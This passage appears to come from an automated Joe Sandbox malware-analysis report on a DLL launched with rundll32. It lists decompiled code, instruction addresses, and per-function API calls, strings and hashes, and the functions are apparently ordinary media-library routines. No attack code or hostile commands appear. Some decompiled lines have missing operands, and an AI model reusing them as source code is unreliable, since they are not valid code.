							_t92 =  <=  ? 0xfffffffa - _t122 : _t91;
							_t136 = _t167[2];
							_t86 = ( <=  ? 0xfffffffa - _t122 : _t91) + _t122;
							_t167[1] = _t86;
							if(_t136 != 0) {
								goto L39;
							}
							goto L40;
						} else {
							_t123 = _t168[7];
							_t159 = 0x7fffffff;
							_t145 = _t167[1];
							_t118 = _t167[2];
							if(_t123 <= 0x3fffffff) {
								_t159 = _t123 + _t123;
							}
							goto L11;
						}
						goto L66;
					}
				}
				L66:
			}

0x1000913a
0x10009141
0x1000914b
0x10009377
0x10009377
0x10009151
0x10009151
0x1000919d
0x1000919d
0x100091a6
0x100091a9
0x100091ab
0x00000000
0x00000000
0x100091b4
0x100091bc
0x100091bc
0x100091bf
0x100091bf
0x100091c4
0x10009287
0x1000928b
0x1000928e
0x10009296
0x100092d6
0x100092d9
0x100092db
0x100092e0
0x100093f6
0x100094c6
0x100094c9
0x100094cc
0x100094cc
0x10009402
0x100094b6
0x100094bb
0x100094be
0x100094be
0x1000940e
0x100094a5
0x100094ab
0x100094ae
0x100094ae
0x10009414
0x10009416
0x10009419
0x10009421
0x10009421
0x10009421
0x10009426
0x00000000
0x1000942c
0x00000000
0x1000942c
0x00000000
0x100092e6
0x100092e9
0x100092eb
0x100092eb
0x100092f1
0x100092f1
0x100092e9
0x100092f4
0x100092f7
0x100092f9
0x100092fe
0x100092fe
0x10009304
0x10009306
0x10009306
0x10009311
0x1000931b
0x1000931e
0x10009323
0x100093b3
0x100094ee
0x100094ef
0x100094f4
0x100094f5
0x100094f5
0x100093bc
0x100094d2
0x100094d5
0x100094d8
0x100094db
0x100094de
0x100094de
0x100093c5
0x100093cb
0x100093d1
0x100093d3
0x100093d6
0x100093d9
0x100093dc
0x100093df
0x100093e3
0x100093e7
0x100093e9
0x100093e9
0x100093c5
0x10009329
0x1000932d
0x10009332
0x10009337
0x10009337
0x1000933c
0x10009342
0x10009342
0x10009345
0x10009351
0x10009354
0x10009356
0x10009359
0x1000935e
0x10009360
0x10009363
0x10009366
0x10009369
0x00000000
0x10009369
0x00000000
0x10009298
0x1000929f
0x100092a3
0x100092a6
0x100092b1
0x100092b5
0x100092ba
0x100092be
0x100092c5
0x10009460
0x10009469
0x1000946d
0x1000947f
0x100092cb
0x100092cd
0x100092d3
0x00000000
0x100092d3
0x00000000
0x100092cd
0x100092c5
0x100091d2
0x100091db
0x100091e2
0x100091e8
0x10009160
0x100091ee
0x100091ee
0x100091ee
0x10009164
0x10009168
0x1000916b
0x1000916b
0x1000916d
0x10009173
0x10009179
0x10009250
0x10009257
0x1000925e
0x00000000
0x00000000
0x00000000
0x00000000
0x1000917f
0x1000917f
0x10009182
0x10009189
0x10009281
0x10009281
0x10009284
0x00000000
0x1000918f
0x10009191
0x10009260
0x10009260
0x10009263
0x10009265
0x10009268
0x1000926b
0x10009272
0x10009382
0x10009495
0x10009498
0x1000949a
0x1000949b
0x1000949d
0x1000949d
0x1000949d
0x1000938b
0x10009480
0x10009483
0x10009486
0x10009489
0x1000948c
0x1000948c
0x10009394
0x1000939a
0x1000939c
0x1000939f
0x100093a2
0x100093a5
0x100093a5
0x10009394
0x1000927a
0x1000927a
0x1000927a
0x10009197
0x1000919a
0x00000000
0x1000919a
0x10009189
0x10009179
0x00000000
0x100091f8
0x100091f8
0x10009203
0x10009207
0x10009212
0x10009216
0x1000921b
0x1000921e
0x10009225
0x10009438
0x10009444
0x10009447
0x1000944a
0x1000944c
0x10009451
0x00000000
0x10009457
0x00000000
0x1000922b
0x1000922b
0x1000922f
0x10009234
0x10009237
0x10009240
0x10009246
0x10009246
0x00000000
0x10009240
0x00000000
0x10009225
0x1000919d
0x00000000

APIs

mv_realloc.F072 ref: 10009182
strlen.MSVCRT ref: 100091B7
strftime.MSVCRT ref: 1000921E

Strings

[truncated strftime output], xrefs: 10009311
!!!!, xrefs: 1000941C

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_reallocstrftimestrlen
String ID: !!!!$[truncated strftime output]
API String ID: 709960874-1743851734
Opcode ID: d5bbf64755c465b92655ce73a4e1a41950866e2796eda1fbafdbb6a7e4c7dd5d
Instruction ID: 6237faa146818e252d6bc5810784fdb2c70fb651bac13d65fe422c41695cf2e5
Opcode Fuzzy Hash: d5bbf64755c465b92655ce73a4e1a41950866e2796eda1fbafdbb6a7e4c7dd5d
Instruction Fuzzy Hash: 40A19071A042429FE715CF28C98539E77E2EF843D0F268528ED898B399E735DE45CB42

Uniqueness

Uniqueness Score: -1.00%

Function 10092740 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

isspace.MSVCRT ref: 1009277B
isupper.MSVCRT ref: 100927CA
islower.MSVCRT ref: 100927DA
isupper.MSVCRT ref: 100928B9
_errno.MSVCRT ref: 10092900

Strings

$, xrefs: 10092764

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: isupper$_errnoislowerisspace
String ID: $
API String ID: 4095548146-3993045852
Opcode ID: be9900f16ef8ba6dd7badc9de842b1b9b2026b697452fe85c3562d42e694471b
Instruction ID: e6fe0532defbc5c939969159b76f19bdcb6dcf227e53754754f51ab417db1434
Opcode Fuzzy Hash: be9900f16ef8ba6dd7badc9de842b1b9b2026b697452fe85c3562d42e694471b
Instruction Fuzzy Hash: 91619074A0C3858BC704CF68C48021EFBE6EFC9354F154A2DF8D99B391D674D945AB42

Uniqueness

Uniqueness Score: -1.00%

Function 1000C470 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 56COMMON

Download Yara Rule

APIs

mv_bprint_init_for_buffer.F072 ref: 1000C4A8
mv_bprintf.F072 ref: 1000C4D0

Strings

none, xrefs: 1000C4C7
ambisonic ACN %d, xrefs: 1000C534
user %d, xrefs: 1000C51C

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_bprint_init_for_buffermv_bprintf
String ID: ambisonic ACN %d$none$user %d
API String ID: 2490314137-4180635230
Opcode ID: b66278b44bd33978a7099e039c8c5aff353fdb60d4a10324e67c31c1774a271f
Instruction ID: b6a1bd800e9813b9dae9be9b31ba14f11150b02b1f0a339f321a001e9bfab4f6
Opcode Fuzzy Hash: b66278b44bd33978a7099e039c8c5aff353fdb60d4a10324e67c31c1774a271f
Instruction Fuzzy Hash: B71172B4909B558BE320DF24C48096EB7E0FF847C4F51881EF5D887289D334A981DB93

Uniqueness

Uniqueness Score: -1.00%

Function 1000C2D0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 56COMMON

Download Yara Rule

APIs

mv_bprint_init_for_buffer.F072 ref: 1000C308
mv_bprintf.F072 ref: 1000C330

Strings

NONE, xrefs: 1000C327
USR%d, xrefs: 1000C37C
AMBI%d, xrefs: 1000C394

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_bprint_init_for_buffermv_bprintf
String ID: AMBI%d$NONE$USR%d
API String ID: 2490314137-3656852315
Opcode ID: 43d24e6ab82ebdc785fe14ad5c403714f51aa5fcf9dbfb0c2afa0a7af5774545
Instruction ID: 0a946672120a056d3661d42bdbf04e5838db89b9617306f254fc419f9ddf239a
Opcode Fuzzy Hash: 43d24e6ab82ebdc785fe14ad5c403714f51aa5fcf9dbfb0c2afa0a7af5774545
Instruction Fuzzy Hash: 41117FB4919745CBE314EF28C480A5EB7E0FF84380F51C92EF68897254C334AA419B93

Uniqueness

Uniqueness Score: -1.00%

Function 10002670 Relevance: 12.1, APIs: 8, Instructions: 99COMMON

Download Yara Rule

APIs

mv_samples_get_buffer_size.F072 ref: 1000269F
mv_mallocz.F072 ref: 100026B3
mv_sample_fmt_is_planar.F072(?), ref: 100026DC
mv_calloc.F072(?), ref: 100026F5
mv_fifo_alloc2.F072(?), ref: 10002736
mv_fifo_freep2.F072(?), ref: 10002761
mv_freep.F072(?), ref: 1000276E

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_callocmv_fifo_alloc2mv_fifo_freep2mv_freepmv_malloczmv_sample_fmt_is_planarmv_samples_get_buffer_size
String ID:
API String ID: 3721653357-0
Opcode ID: 6a25a427b3a7cd424786be72b2dc5f3278f13d1d67c199b93a466af71cd06fba
Instruction ID: e2c14ad1b6a78883c2eba2dd48e6cbb770f894d0147dffab9e861290766f1c48
Opcode Fuzzy Hash: 6a25a427b3a7cd424786be72b2dc5f3278f13d1d67c199b93a466af71cd06fba
Instruction Fuzzy Hash: 34311AB86087068FD700DF6AD58061AFBE4FF88394F51892EE99CC7211E774E855CB92

Uniqueness

Uniqueness Score: -1.00%

Function 1001D220 Relevance: 12.1, APIs: 8, Instructions: 71COMMON

Download Yara Rule

APIs

mv_mallocz.F072 ref: 1001D230
mv_sha512_alloc.F072 ref: 1001D273
mv_sha512_alloc.F072 ref: 1001D2BB
mv_md5_alloc.F072 ref: 1001D2EB
mv_sha_alloc.F072 ref: 1001D31B
mv_sha_alloc.F072 ref: 1001D34B
mv_sha_alloc.F072 ref: 1001D37B

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_sha_alloc$mv_sha512_alloc$mv_malloczmv_md5_alloc
String ID:
API String ID: 1780169607-0
Opcode ID: 50135c56b61823b36176c8843c5ea436513e172120641a91292998debd03ff9b
Instruction ID: c35801f6e3b9458600ddf5c5e3e107538d07f14f20f18202b00d36dbdc320db3
Opcode Fuzzy Hash: 50135c56b61823b36176c8843c5ea436513e172120641a91292998debd03ff9b
Instruction Fuzzy Hash: C731E5B4116350CED740EF50D548A86BAE0FF00354FA7C5A9D61A4F222C7BED584DBE6

Uniqueness

Uniqueness Score: -1.00%

Function 1001E360 Relevance: 12.1, APIs: 8, Instructions: 64COMMON

Download Yara Rule

APIs

mv_mallocz.F072 ref: 1001E381
mv_frame_alloc.F072 ref: 1001E390

Part of subcall function 1001AC40: mv_malloc.F072 ref: 1001AC56

mv_frame_ref.F072 ref: 1001E3A6

Part of subcall function 1001BC40: mv_channel_layout_check.F072 ref: 1001BC94
Part of subcall function 1001BC40: mv_channel_layout_check.F072 ref: 1001BCDF
Part of subcall function 1001BC40: mv_buffer_ref.F072 ref: 1001BD0E
Part of subcall function 1001BC40: mv_calloc.F072 ref: 1001BD48
Part of subcall function 1001BC40: mv_buffer_ref.F072 ref: 1001BD97

mv_buffer_ref.F072 ref: 1001E3B4

Part of subcall function 10009FC0: mv_mallocz.F072 ref: 10009FD2

mv_buffer_create.F072 ref: 1001E3ED

Part of subcall function 10009E60: mv_mallocz.F072 ref: 10009E86
Part of subcall function 10009E60: mv_mallocz.F072 ref: 10009EBF

mv_buffer_unref.F072 ref: 1001E413
mv_frame_free.F072 ref: 1001E41B

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_mallocz$mv_buffer_ref$mv_channel_layout_check$mv_buffer_createmv_buffer_unrefmv_callocmv_frame_allocmv_frame_freemv_frame_refmv_malloc
String ID:
API String ID: 2471893243-0
Opcode ID: 50673311061d5e9090930dd3f83a2bf224b626f2df663858ce286107a4d00b9a
Instruction ID: e44850cc1d663ee6b079855d6d5ccf767aeb5a2a45f4db7414dc8b10b7331849
Opcode Fuzzy Hash: 50673311061d5e9090930dd3f83a2bf224b626f2df663858ce286107a4d00b9a
Instruction Fuzzy Hash: EA21B3745087458FD780EF29C58021EFBE0EF89350F51892DFA988B346EB74E881CB92

Uniqueness

Uniqueness Score: -1.00%

Function 10022610 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 344COMMON

Download Yara Rule

APIs

mv_pix_fmt_desc_get.F072 ref: 10022691
mv_image_get_linesize.F072 ref: 1002282F
mv_log.F072 ref: 10022AC0
abort.MSVCRT ref: 10022AC5

Strings

av_image_get_linesize failed, xrefs: 10022A16
Assertion %s failed at %s:%d, xrefs: 10022AB1

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: abortmv_image_get_linesizemv_logmv_pix_fmt_desc_get
String ID: Assertion %s failed at %s:%d$av_image_get_linesize failed
API String ID: 1423692287-2525362290
Opcode ID: 3ba8b928b0e2e591675b6da61631b884aeed625d3802fe22cac3d10d96b15f9a
Instruction ID: a2789ba4896ffccc60d1fb11a9358e28422a5f1174f25c27da114458ab982159
Opcode Fuzzy Hash: 3ba8b928b0e2e591675b6da61631b884aeed625d3802fe22cac3d10d96b15f9a
Instruction Fuzzy Hash: 59D1AC75A093519FC354CF68D080A2AFBF1FF88354F96896DE8899B311E735E981CB42

Uniqueness

Uniqueness Score: -1.00%

Function 10023180 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

mv_pix_fmt_desc_get.F072 ref: 1002319F
mv_image_get_linesize.F072 ref: 100231D4

Part of subcall function 10021480: mv_pix_fmt_desc_get.F072(?,?,?,?,?,?,?,?,?,?,00000000,?,100B6C20,00000000,10022208), ref: 10021496

mv_image_fill_linesizes.F072(?), ref: 10023268
mv_image_fill_plane_sizes.F072(?), ref: 100232CB

Strings

Picture size %ux%u is invalid, xrefs: 1002331F

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_pix_fmt_desc_get$mv_image_fill_linesizesmv_image_fill_plane_sizesmv_image_get_linesize
String ID: Picture size %ux%u is invalid
API String ID: 3680373976-1963597007
Opcode ID: 07e5c2be4807f6978617a4492a07696999ca7ae4d9d795ec3814173b8ca04270
Instruction ID: 42873512ec11e61a891db32c639e21bb7bc2094a7c171237446aa949f8b4b16f
Opcode Fuzzy Hash: 07e5c2be4807f6978617a4492a07696999ca7ae4d9d795ec3814173b8ca04270
Instruction Fuzzy Hash: 80513576A083418BC384CF69D88064EBBE2EFC8750F55CA3EE598C7350EA75DA448B42

Uniqueness

Uniqueness Score: -1.00%

Function 100121A0 Relevance: 10.6, APIs: 7, Instructions: 119COMMON

Download Yara Rule

APIs

mv_strdup.F072 ref: 1001221F
mv_bprint_init.F072 ref: 1001225D
mv_bprint_escape.F072 ref: 100122B3
mv_bprint_append_data.F072 ref: 100122CC
mv_bprint_escape.F072 ref: 100122EE
mv_bprint_finalize.F072 ref: 1001231B

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_bprint_escape$mv_bprint_append_datamv_bprint_finalizemv_bprint_initmv_strdup
String ID:
API String ID: 806756221-0
Opcode ID: 55f0c84e98da42de065d76c2acb9437629b6bfeb986306e9a32b1f14191fa22a
Instruction ID: 1123dba4393114ef0ad0658bdbc6ab6a3ceb4212d851131ba1441c628290b326
Opcode Fuzzy Hash: 55f0c84e98da42de065d76c2acb9437629b6bfeb986306e9a32b1f14191fa22a
Instruction Fuzzy Hash: 8C4114B55093449BC360CF28C08025ABBE5FF85394F55892EE9988B341E636EA95CB46

Uniqueness

Uniqueness Score: -1.00%

Function 10092340 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 74stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 10092352
_errno.MSVCRT ref: 10092370
rand.MSVCRT ref: 100923D0
_sopen.MSVCRT ref: 10092416
_errno.MSVCRT ref: 10092424

Strings

XXXX, xrefs: 10092368

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: _errno$_sopenrandstrlen
String ID: XXXX
API String ID: 1081397658-1518373315
Opcode ID: 82e0733fef7f5bb36d99413f1072fc2f656cde989d35784bfb4da4dbfebec7eb
Instruction ID: 5ba2c4e2c30cf57021d4c67dc99ab4cf3299af9f9df0caf2ec803c7fcbdd4207
Opcode Fuzzy Hash: 82e0733fef7f5bb36d99413f1072fc2f656cde989d35784bfb4da4dbfebec7eb
Instruction Fuzzy Hash: A62137B190934A9FC704EF24889015E7BE4EF86394F11C92DF4998B291D6399A49DB81

Uniqueness

Uniqueness Score: -1.00%

Function 1000C220 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 39COMMON

Download Yara Rule

APIs

mv_bprintf.F072 ref: 1000C27B
mv_bprintf.F072 ref: 1000C298
mv_bprintf.F072 ref: 1000C2B8

Strings

NONE, xrefs: 1000C247
USR%d, xrefs: 1000C28C
AMBI%d, xrefs: 1000C2AC

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_bprintf
String ID: AMBI%d$NONE$USR%d
API String ID: 3083893021-3656852315
Opcode ID: 79c1b8cc5645a9667c6a0867682904637ac744c720650d4db15b242002d3a8e6
Instruction ID: 215f8c01a0ebe083e3755320398acc4362dbfeb093f1504df316b337c640c054
Opcode Fuzzy Hash: 79c1b8cc5645a9667c6a0867682904637ac744c720650d4db15b242002d3a8e6
Instruction Fuzzy Hash: 16012CB8909B418BD304EF28848052EBAE1FF84284FD48A6DE4CC87755E639DA409B83

Uniqueness

Uniqueness Score: -1.00%

Function 1000C3C0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 39COMMON

Download Yara Rule

APIs

mv_bprintf.F072 ref: 1000C41B
mv_bprintf.F072 ref: 1000C438
mv_bprintf.F072 ref: 1000C458

Strings

none, xrefs: 1000C3E7
ambisonic ACN %d, xrefs: 1000C44C
user %d, xrefs: 1000C42C

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

